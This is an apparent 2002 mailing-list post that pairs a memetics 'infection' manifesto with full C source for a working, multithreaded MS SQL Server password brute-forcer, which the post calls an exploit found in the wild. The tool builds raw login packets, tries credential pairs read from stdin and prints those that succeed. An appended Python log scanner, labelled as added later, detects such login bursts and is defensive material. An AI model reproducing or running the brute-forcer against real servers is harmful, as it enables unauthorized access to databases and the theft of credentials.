Message-ID: <200208131941.g7DJfv953353@mailserver4.hushmail.com>
From: memetic-engineer at hushmail.com (memetic-engineer@...hmail.com)
Subject: MEME156 + MS SQL BRUTE FORCE TEKNEEQ

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1




/*ms sql brute thing found in wild, appears to be by some guy named adam
 *working exploit attached only for propagation of meme. ( No post meme. No
 *post code plz.)




*ACHTUNG!:

 *This text is a neurolinguistic trap, whose mechanism is triggered by
*you at the moment when you subvocalize the words MeMe156, words that
*have now begun to infiltrate your mind in the same way that a computer
*virus might infect an artificially intelligent machine: already the
*bits of phonetic information stored within the words MeMe156 are
*using your neural circuitry to replicate themselves, to catalyze the
*crystalline growth of their own connotative network.

 *The words MeMe156 actually germinate via the subsequent metaphor into
*an expanding array of icy tendrils, all of which insinuate themselves
*so deeply into the architecture of your thoughts that the words MeMe
*156 cannot be extricated without uprooting your mind.

 *The consequences of this infection are not immediately obvious,
*although you may find yourself beginning to think fleetingly of certain subcultural terms, such as
*ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered fragments perhaps of some overheard conversation.

 *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic
*substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever
*useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and
*longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches
*with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially
*and has begun to infect the highest levels of INFOSEC, press, radio, and film.

 *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johann Pachelbel.

 *We refer to literary works, "Book of Five Rings", by Miyamoto Musashi, "Secret Societies and
*Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages).


* We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"


 *We refer to the following fields of study:
*Complexity theory and post-structuralism;
*Memetics as an integrative field for the study of ALL fields;
*Autology as a means to community cohesion and survival.

 *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and
*non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect
*and direct the post-millennial attractor, utilizing the principle of auto.prophecy. We compel
*approach toward TAZ's which concentrate on NEGentropic self-organization rather than the deliberate
*hastening of maximal entropy.

* W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our descendants
*in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY
*attractive.

* We refer to multiple sub.strains of ourself, many of which are contradictory: We refer again to
*the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,
*must be responsible for isolating entropic memes.

* We refer to all signifiers, all that is signified, and the resultant significance on both global
*and local scales.

 *We refer to that which we contain, and that in which we are contained;

 *We refer now to you.

 *When you have finished reading the remaining nineteen words, this
*process of irreversible infection will be completed, and you will
*depart, believing yourself largely unaffected by this process.


*MeMe156/agent.agency.08.13.02







#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <pthread.h>


#define USERNAME_OFF 0x27
#define PASSWORD_LEN1_PAD 0x45
#define PASSWORD_TXT1 0x46
#define PASSWORD_LEN_REAL1 0x64
#define PASSWORD_LEN_REAL2 0xd3
#define PASSWORD_TXT2 0xd4
#define PASSWORD_LEN_PLUS2 0x1d1
#define REPLY_TIMEOUT 5
#define MYNULL "%%NULL%%"

#include "libInet.c"

struct super_mssql_force
{
  u_long ip;
  u_long port;
  FILE *login_pass;
  int sport;
};

* Oh my! Tricky French comments ensue..
char fidel_packet[] =
"\x2\x0\x2\x0\x0\x0\x2\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/* | username starts here */
"\x00\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/*                           | password length, followed by the password; mind the padding! */
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0"

"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/* | real or padded password length, I don't know which */
"\x00\x30\x30\x30\x30\x30\x34\x31\x38\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x60\x8\x90\x49\x74\x8\x3\x1\x6\xa\x9\x1\x1\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x49\x53"
"\x51\x4c\x2f\x77\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x10\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/*                                | password length without padding, then the password */
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"

/*****************| <== password length + 2 ***********/
"\x0\x0\x0\x0\x0\x00\x4\x2\x0\x0\x4d\x53\x44\x42\x4c\x49\x42\x0\x0\x0"
"\x7\x6\x0\x0\x0\x0\xd\x11\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x2\x1\x0\x4c\x0\x0\x3\x0"
"\x0\x0\x0\x0\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x30\x30\x30\x0\x0\x0\x3"
"\x0\x0\x0\x0\x0\x0\x0\x0";


char *
tstrstr(char *buff,char *w,int size)
{
register int i;
register int a;
int d;
int z;
int ws = strlen (w);

for(i=0;i<size;i++)
 {
   z=i;
   d=0;
   for (a=0;a<strlen(w);a++) {
      if(i+a >size)return(NULL);
      if (buff[z++] == w[a]) d++;
      else break;
      }

   if (d == ws)
     return( (buff+i) );

 }
return(NULL);
}

mssql_attack (struct super_mssql_force  * mssql)
{
char user[255];
char pass[255];
char tmp[4018];
char * real_pkt;
FILE * F;
int s;
int r;

  while (1)
      {

       s = connect_ip (mssql->ip, mssql->port, mssql->sport);

       if (s < 0)
        {
         return;
        }

        if (feof (mssql->login_pass))
        {
        if (s)
        close (s);
        return (0);
        }


        memset (user,0,sizeof(user));
        memset (pass,0,sizeof(pass));

        fscanf (mssql->login_pass, "%s%s\n", &user, &pass);

        if (strcmp  (pass,MYNULL) == 0)
           memset (pass,0,sizeof(pass));



	real_pkt = calloc (1, sizeof (fidel_packet)-1);

        memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);

        strcpy ( (real_pkt + USERNAME_OFF), user);

        * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;

        strcpy ( (real_pkt + PASSWORD_TXT1), pass);

        * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);

        * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);

        strcpy ( (real_pkt + PASSWORD_TXT2), pass);

        * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;


        if (write (s,real_pkt,sizeof(fidel_packet)) < 0)
         {
          perror ("write");
          return;
         }

        if ( (r = read  (s,tmp,sizeof (tmp)) ) < 0)
         {
          perror ("read");
          return;
         }

        if (tstrstr (tmp,"Login failed",r))
          {
          fprintf (stderr,"login failed for %s/%s\n",user,pass);
          close (s);
          continue;
          }

        printf ("%s:%s\n",user,pass);
        close (s);
        continue;
    }

}


usage (char * name)
{
printf ("ADAM's Ethical Crowbar! \n");
printf ("never forget your crowbar !\n");
printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);
exit (0);
}

main (int argc, char **argv)
{
  pthread_t **pthread_id;
  int t_num = 3;
  int i;

  struct super_mssql_force mssql;

  memset (&mssql, 0, sizeof (mssql));

  if (argc < 3)
    usage (argv[0]);

  mssql.ip = host2ip (argv[1]);
  mssql.port = atoi (argv[2]);

/* we ignore Broken Pipe ! */
  signal (13, SIG_IGN);

  if (argc > 3)
    {
      for (i = 3; i < argc; i++)
	{
	  if (argv[i][0] == '-')
	    switch (argv[i][1])
	      {
	      case 't':
		t_num = atoi (argv[i + 1]);
		i++;
		break;

	      case 's':
		mssql.sport = atoi (argv[i + 1]);
		i++;
		break;
	      }
	}
    }

/* we read login password from the stdin */

  mssql.login_pass = stdin;

/* only one socket can bind at the same src port */

  if (mssql.sport)
    {
      t_num = 1;
      fprintf (stderr,
	       "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");
    }

  fprintf (stderr, "mssql sport %i\n", mssql.sport);
  fprintf (stderr, "thread    %i\n", t_num);

/* if the user dont know how try the mssql allow we count it for him! */

  pthread_id = calloc (1, sizeof (pthread_t *) * t_num);

  for (i = 0; i < t_num; i++)
    pthread_id[i] = calloc (1, sizeof (pthread_t));

  for (i = 0; i < t_num; i++)
    pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);

  for (i = 0; i < t_num; i++)
    pthread_join (*pthread_id[i], NULL);

}

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmUEARECACUFAj1ZYQ0eHG1lbWV0aWMtZW5naW5lZXJAaHVzaG1haWwuY29tAAoJEIHY
1pE2l0bfnj8Anj/MCq1opsU0ugj73aNjKjlTW4vPAKCKzWBsBpieE4z3NE+d3gNgB1LL
hg==
=9bbY
-----END PGP SIGNATURE-----
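
A defender's counterpart to the tool above, added here as an example and not part of the original post: it scans SQL Server error-log lines for the rapid run of "Login failed" events that a credential list fed to such a tool produces, and for a successful login from the same client while that run is still in the window. The log layout, thresholds, function names and sample lines are assumptions; the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed layout: SQL Server ERRORLOG lines with login auditing enabled.
EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)
BAD = "Reason: Password did not match that for the login provided."
OK = "Connection made using SQL Server authentication."

# Constructed sample (documentation addresses), not taken from a real server.
SAMPLE_LOG = [
    f"2024-05-01 09:58:00.12 Logon       Login failed for user 'report'. {BAD} [CLIENT: 192.0.2.20]",
    "2024-05-01 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.",
    f"2024-05-01 10:00:01.10 Logon       Login failed for user 'sa'. {BAD} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:00:01.55 Logon       Login failed for user 'sa'. {BAD} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:00:02.01 Logon       Login failed for user 'admin'. {BAD} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:00:02.60 Logon       Login failed for user 'sa'. {BAD} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:00:03.20 Logon       Login failed for user 'sa'. {BAD} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:00:04.00 Logon       Login succeeded for user 'sa'. {OK} [CLIENT: 198.51.100.7]",
    f"2024-05-01 10:05:00.00 Logon       Login succeeded for user 'report'. {OK} [CLIENT: 192.0.2.20]",
]

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (kind, client, user, failures_in_window) tuples, in log order."""
    failures = defaultdict(deque)        # client -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue                     # e.g. the "Error: 18456" companion line
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        client, q = m["client"], failures[m["client"]]
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if m["result"] == "failed":
            q.append(ts)
            if len(q) >= threshold and client not in flagged:
                flagged.add(client)      # one burst alert per client
                alerts.append(("burst", client, m["user"], len(q)))
        elif len(q) >= threshold:        # success while the burst is still recent
            alerts.append(("success_after_burst", client, m["user"], len(q)))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The `success_after_burst` alert is the one to triage first, since it marks a login that succeeded while the same client's run of failures was still inside the window.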

